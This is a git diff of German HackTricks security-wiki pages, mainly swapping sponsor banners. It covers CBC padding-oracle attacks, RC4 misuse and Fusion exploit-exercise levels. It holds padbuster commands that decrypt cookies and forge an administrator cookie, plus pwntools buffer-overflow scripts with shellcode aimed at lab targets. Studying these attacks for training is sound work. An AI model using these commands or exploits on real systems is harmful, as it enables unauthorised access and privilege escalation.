-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegramm-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
- +{% endhint %} # CBC - Cipher Block Chaining -Im CBC-Modus wird der **vorherige verschlüsselte Block als IV** verwendet, um mit dem nächsten Block zu XOR: +Im CBC-Modus wird der **vorherige verschlüsselte Block als IV** verwendet, um mit dem nächsten Block zu XOR-en: ![https://defuse.ca/images/cbc\_encryption.png](https://defuse.ca/images/cbc\_encryption.png) -Um CBC zu entschlüsseln, werden die **gegensätzlichen** **Operationen** durchgeführt: +Um CBC zu entschlüsseln, werden die **gegenteiligen Operationen** durchgeführt: ![https://defuse.ca/images/cbc\_decryption.png](https://defuse.ca/images/cbc\_decryption.png) @@ -27,8 +27,8 @@ Beachten Sie, dass ein **Verschlüsselungs**-**Schlüssel** und ein **IV** verwe # Nachrichten-Padding -Da die Verschlüsselung in **festen** **Blockgrößen** durchgeführt wird, ist in der Regel ein Padding im **letzten** **Block** erforderlich, um seine Länge zu vervollständigen.\ -In der Regel wird **PKCS7** verwendet, das ein Padding generiert, das die **Anzahl** der **benötigten Bytes** wiederholt, um den Block zu vervollständigen. Wenn zum Beispiel dem letzten Block 3 Bytes fehlen, wird das Padding `\x03\x03\x03` sein. +Da die Verschlüsselung in **festen** **Blockgrößen** durchgeführt wird, ist in **letztem** **Block** normalerweise ein Padding erforderlich, um seine Länge zu vervollständigen.\ +Normalerweise wird **PKCS7** verwendet, das ein Padding generiert, das die **Anzahl** der **benötigten Bytes** zum **Vervollständigen** des Blocks **wiederholt**. Wenn beispielsweise im letzten Block 3 Bytes fehlen, wird das Padding `\x03\x03\x03` sein. Schauen wir uns weitere Beispiele mit **2 Blöcken der Länge 8 Bytes** an: @@ -39,17 +39,17 @@ Schauen wir uns weitere Beispiele mit **2 Blöcken der Länge 8 Bytes** an: | P | A | S | S | W | O | R | D | 1 | 2 | 3 | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** | | P | A | S | S | W | O | R | D | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | -Beachten Sie, wie im letzten Beispiel der **letzte Block voll war, sodass ein weiterer Block nur mit Padding generiert wurde**. +Beachten Sie, wie im letzten Beispiel der **letzte Block voll war, sodass ein weiterer nur mit Padding generiert wurde**. -# Padding Oracle +# Padding-Oracle -Wenn eine Anwendung verschlüsselte Daten entschlüsselt, entschlüsselt sie zuerst die Daten; dann entfernt sie das Padding. Während der Bereinigung des Paddings, wenn ein **ungültiges Padding ein erkennbares Verhalten auslöst**, haben Sie eine **Padding-Oracle-Schwachstelle**. Das erkennbare Verhalten kann ein **Fehler**, ein **Fehlen von Ergebnissen** oder eine **langsamere Antwort** sein. +Wenn eine Anwendung verschlüsselte Daten entschlüsselt, wird sie zuerst die Daten entschlüsseln; dann wird sie das Padding entfernen. Während der Bereinigung des Paddings, wenn ein **ungültiges Padding ein erkennbares Verhalten auslöst**, haben Sie eine **Padding-Oracle-Schwachstelle**. Das erkennbare Verhalten kann ein **Fehler**, ein **Fehlen von Ergebnissen** oder eine **langsamere Antwort** sein. Wenn Sie dieses Verhalten erkennen, können Sie die **verschlüsselten Daten entschlüsseln** und sogar **beliebigen Klartext verschlüsseln**. ## Wie man ausnutzt -Sie könnten [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) verwenden, um diese Art von Schwachstelle auszunutzen oder einfach... +Sie könnten [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) verwenden, um diese Art von Schwachstelle auszunutzen oder einfach ``` sudo apt-get install padbuster ``` @@ -57,65 +57,48 @@ Um zu testen, ob das Cookie einer Website anfällig ist, könnten Sie Folgendes ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" ``` -**Kodierung 0** bedeutet, dass **base64** verwendet wird (aber andere sind verfügbar, überprüfen Sie das Hilfemenü). +**Encoding 0** bedeutet, dass **base64** verwendet wird (aber andere sind verfügbar, überprüfen Sie das Hilfemenü). -Sie könnten auch diese Schwachstelle **ausnutzen, um neue Daten zu verschlüsseln**. Zum Beispiel, stellen Sie sich vor, der Inhalt des Cookies lautet "**_**user=MyUsername**_**", dann könnten Sie es zu "\_user=administrator\_" ändern und Privilegien in der Anwendung eskalieren. Sie könnten dies auch mit `paduster` tun, indem Sie den Parameter -plaintext** angeben: +Sie könnten auch **diese Schwachstelle ausnutzen, um neue Daten zu verschlüsseln. Zum Beispiel, stellen Sie sich vor, der Inhalt des Cookies lautet "**_**user=MyUsername**_**", dann könnten Sie es in "\_user=administrator\_" ändern und Privilegien innerhalb der Anwendung eskalieren. Sie könnten dies auch mit `padbuster` tun, indem Sie den Parameter -plaintext** angeben: ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator" ``` -Wenn die Website anfällig ist, wird `padbuster` automatisch versuchen, den Zeitpunkt des Padding-Fehlers zu finden. Sie können jedoch auch die Fehlermeldung mit dem **-error**-Parameter angeben. +Wenn die Website anfällig ist, wird `padbuster` automatisch versuchen, den Zeitpunkt zu finden, an dem der Padding-Fehler auftritt. Sie können jedoch auch die Fehlermeldung angeben, indem Sie den Parameter **-error** verwenden. ```bash perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding" ``` ## Die Theorie -Zusammenfassend kann man beginnen, die verschlüsselten Daten zu entschlüsseln, indem man die richtigen Werte errät, die verwendet werden können, um alle verschiedenen Paddings zu erstellen. Dann beginnt der Padding-Oracle-Angriff damit, Bytes vom Ende bis zum Anfang zu entschlüsseln, indem geraten wird, welcher Wert der richtige ist, der ein Padding von 1, 2, 3 usw. erzeugt. +Zusammengefasst können Sie beginnen, die verschlüsselten Daten zu entschlüsseln, indem Sie die korrekten Werte erraten, die verwendet werden können, um alle verschiedenen **Paddings** zu erstellen. Dann wird der Padding-Oracle-Angriff beginnen, Bytes vom Ende zum Anfang zu entschlüsseln, indem geraten wird, welcher der korrekte Wert ist, der ein Padding von 1, 2, 3 usw. erstellt. ![](<../.gitbook/assets/image (629) (1) (1).png>) -Stellen Sie sich vor, Sie haben einen verschlüsselten Text, der aus 2 Blöcken besteht, die aus den Bytes von E0 bis E15 gebildet werden. Um den letzten Block (E8 bis E15) zu entschlüsseln, durchläuft der gesamte Block die "Blockchiffre-Entschlüsselung" und erzeugt die Zwischenbytes I0 bis I15. Schließlich wird jedes Zwischenbyte mit den vorherigen verschlüsselten Bytes (E0 bis E7) XOR-verknüpft. Also: +Stellen Sie sich vor, Sie haben einen verschlüsselten Text, der **2 Blöcke** umfasst, die aus den Bytes von **E0 bis E15** gebildet sind. Um den **letzten Block** (**E8** bis **E15**) zu **entschlüsseln**, durchläuft der gesamte Block die "Blockchiffre-Entschlüsselung", wodurch die **Zwischenbytes I0 bis I15** generiert werden. Schließlich wird jedes Zwischenbyte mit den vorherigen verschlüsselten Bytes (E0 bis E7) **XORed**. Also: -* `C15 = D(E15) ^ E7 = I15 ^ E7` -* `C14 = I14 ^ E6` -* `C13 = I13 ^ E5` -* `C12 = I12 ^ E4` -* ... +- `C15 = D(E15) ^ E7 = I15 ^ E7` +- `C14 = I14 ^ E6` +- `C13 = I13 ^ E5` +- `C12 = I12 ^ E4` +- ... -Nun ist es möglich, `E7` zu ändern, bis `C15` `0x01` ist, was auch ein korrektes Padding ist. In diesem Fall gilt also: `\x01 = I15 ^ E'7` +Nun ist es möglich, `E7` zu **ändern, bis `C15` `0x01` ist**, was auch ein korrektes Padding sein wird. Also, in diesem Fall: `\x01 = I15 ^ E'7` -Daher lässt sich `I15` berechnen, indem man `E'7` findet: `I15 = 0x01 ^ E'7` +Daher, wenn man E'7 findet, ist es **möglich, I15 zu berechnen**: `I15 = 0x01 ^ E'7` -Damit können wir `C15` berechnen: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7` +Das ermöglicht es uns, **C15 zu berechnen**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7` -Nachdem wir `C15` kennen, ist es nun möglich, `C14` zu berechnen, aber diesmal wird das Padding `\x02\x02` per Brute-Force ermittelt. +Nachdem **C15** bekannt ist, ist es nun möglich, **C14 zu berechnen**, aber dieses Mal durch Brute-Force des Paddings `\x02\x02`. -Dieser Brute-Force ist genauso komplex wie der vorherige, da es möglich ist, das `E''15` zu berechnen, dessen Wert 0x02 ist: `E''7 = \x02 ^ I15`, also muss nur das `E'14` gefunden werden, das ein `C14` gleich `0x02` erzeugt. Dann werden die gleichen Schritte durchgeführt, um C14 zu entschlüsseln: `C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6` +Dieser BF ist genauso komplex wie der vorherige, da es möglich ist, das `E''15` zu berechnen, dessen Wert 0x02 ist: `E''7 = \x02 ^ I15`, sodass es nur noch erforderlich ist, den **`E'14`** zu finden, der ein **`C14` gleich `0x02`** erzeugt. Dann die gleichen Schritte ausführen, um C14 zu entschlüsseln: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`** -**Folgen Sie dieser Kette, bis Sie den gesamten verschlüsselten Text entschlüsselt haben.** +**Folgen Sie dieser Kette, bis Sie den gesamten verschlüsselten Text entschlüsseln.** ## Erkennung der Schwachstelle -Registrieren Sie ein Konto und melden Sie sich mit diesem Konto an.\ -Wenn Sie sich **mehrmals anmelden** und jedes Mal das **gleiche Cookie** erhalten, gibt es wahrscheinlich **etwas** **falsch** in der Anwendung. Das zurückgesendete Cookie sollte jedes Mal, wenn Sie sich anmelden, eindeutig sein. Wenn das Cookie **immer** das **gleiche** ist, wird es wahrscheinlich immer gültig sein und es gibt **keine Möglichkeit, es ungültig zu machen**. +Registrieren Sie ein Konto und melden Sie sich mit diesem Konto an. Wenn Sie sich **viele Male anmelden** und immer das **gleiche Cookie** erhalten, gibt es wahrscheinlich **etwas** **Falsches** in der Anwendung. Das zurückgesendete Cookie sollte jedes Mal, wenn Sie sich anmelden, **eindeutig** sein. Wenn das Cookie **immer** das **gleiche** ist, wird es wahrscheinlich immer gültig sein und es wird **keinen Weg geben, es ungültig zu machen**. -Wenn Sie nun versuchen, das Cookie zu **ändern**, erhalten Sie einen **Fehler** von der Anwendung.\ -Aber wenn Sie das Padding per Brute-Force (z.B. mit PadBuster) erzwingen, können Sie ein anderes Cookie erhalten, das für einen anderen Benutzer gültig ist. Dieses Szenario ist höchstwahrscheinlich anfällig für PadBuster. +Wenn Sie nun versuchen, das **Cookie zu ändern**, erhalten Sie einen **Fehler** von der Anwendung. Wenn Sie jedoch das Padding brute-forcen (zum Beispiel mit PadBuster), gelingt es Ihnen, ein anderes Cookie zu erhalten, das für einen anderen Benutzer gültig ist. Dieses Szenario ist höchstwahrscheinlich anfällig für PadBuster. ## Referenzen -* [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation) - - -
- -Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! - -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen** möchten, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder folgen Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. - -
+- [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation) diff --git a/cryptography/rc4-encrypt-and-decrypt.md b/cryptography/rc4-encrypt-and-decrypt.md index 866dd26bb..0f368e073 100644 --- a/cryptography/rc4-encrypt-and-decrypt.md +++ b/cryptography/rc4-encrypt-and-decrypt.md @@ -1,19 +1,20 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
+{% endhint %} -Wenn Sie auf irgendeine Weise einen Klartext mit RC4 verschlüsseln können, können Sie jeden Inhalt, der mit diesem RC4 verschlüsselt wurde (unter Verwendung des gleichen Passworts), nur mit der Verschlüsselungsfunktion entschlüsseln. +Wenn Sie auf irgendeine Weise einen Klartext mit RC4 verschlüsseln können, können Sie jeden Inhalt, der mit diesem RC4 verschlüsselt wurde (unter Verwendung des gleichen Passworts), einfach mit der Verschlüsselungsfunktion entschlüsseln. Wenn Sie einen bekannten Klartext verschlüsseln können, können Sie auch das Passwort extrahieren. Weitere Referenzen finden Sie in der HTB Kryptos-Maschine: @@ -25,16 +26,17 @@ Wenn Sie einen bekannten Klartext verschlüsseln können, können Sie auch das P +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
+{% endhint %} diff --git a/emails-vulns.md b/emails-vulns.md index 603fbceae..209a8fca0 100644 --- a/emails-vulns.md +++ b/emails-vulns.md @@ -1,33 +1,20 @@ # E-Mail-Schwachstellen +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
+{% endhint %} ## ## - -
- -Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! - -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. - -
diff --git a/exploiting/linux-exploiting-basic-esp/fusion.md b/exploiting/linux-exploiting-basic-esp/fusion.md index ac1e9d1c4..d6568ace3 100644 --- a/exploiting/linux-exploiting-basic-esp/fusion.md +++ b/exploiting/linux-exploiting-basic-esp/fusion.md @@ -1,24 +1,25 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} # Level00 [http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/) -1. Ermitteln Sie den Offset, um EIP zu ändern. -2. Geben Sie die Adresse des Shellcodes in EIP ein. +1. Erhalten Sie den Offset, um EIP zu ändern. +2. Geben Sie die Shellcode-Adresse in EIP ein. ```python from pwn import * @@ -45,33 +46,6 @@ r.send(buf) r.interactive() ``` # Level01 - -## Beschreibung - -Level01 ist ein einfacher Exploit, der auf einer Schwachstelle in der `fusion`-Anwendung basiert. Diese Schwachstelle ermöglicht es uns, eine Pufferüberlauf-Attacke durchzuführen und die Kontrolle über das Programm zu übernehmen. - -## Exploit - -Der Exploit besteht aus zwei Schritten: - -1. Erzeugen einer speziell formatierten Eingabe, die den Pufferüberlauf auslöst. -2. Ausnutzen des Pufferüberlaufs, um die Kontrolle über das Programm zu übernehmen. - -### Schritt 1: Erzeugen der speziell formatierten Eingabe - -Um den Pufferüberlauf auszulösen, müssen wir eine Eingabe erzeugen, die länger ist als der Puffer, in den sie geschrieben wird. In diesem Fall ist der Puffer 100 Bytes lang. - -Wir können dies erreichen, indem wir eine Zeichenkette mit einer Länge von 104 Bytes erstellen. Die ersten 100 Bytes werden mit beliebigen Zeichen gefüllt, und die letzten 4 Bytes werden mit der Adresse der Funktion `shell` überschrieben. - -### Schritt 2: Ausnutzen des Pufferüberlaufs - -Nachdem wir die speziell formatierte Eingabe erstellt haben, müssen wir sie an die `fusion`-Anwendung senden. Wenn die Anwendung versucht, die Eingabe in den Puffer zu schreiben, wird der Pufferüberlauf ausgelöst und die Kontrolle über das Programm wird an die Adresse der Funktion `shell` übergeben. - -Dies ermöglicht es uns, beliebigen Code auszuführen und die Kontrolle über das System zu übernehmen. - -## Gegenmaßnahmen - -Um diesen Exploit zu verhindern, sollten Entwickler sicherstellen, dass Eingaben ordnungsgemäß überprüft und auf eine sichere Länge begrenzt werden. Darüber hinaus sollten Sicherheitsmechanismen wie Adressraumlayoutzufälligkeit (ASLR) und Stack-Schutz aktiviert sein, um die Ausnutzung von Pufferüberläufen zu erschweren. ```python from pwn import * @@ -97,16 +71,17 @@ buf += "\x65\xd9\x0f\x01" r.send(buf) r.interactive() ``` +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} diff --git a/exploiting/tools/pwntools.md b/exploiting/tools/pwntools.md index 3a6673c5c..6cfdbb74b 100644 --- a/exploiting/tools/pwntools.md +++ b/exploiting/tools/pwntools.md @@ -1,34 +1,35 @@ +{% hint style="success" %} +Lernen Sie AWS-Hacking und üben Sie es:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking und üben Sie es: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
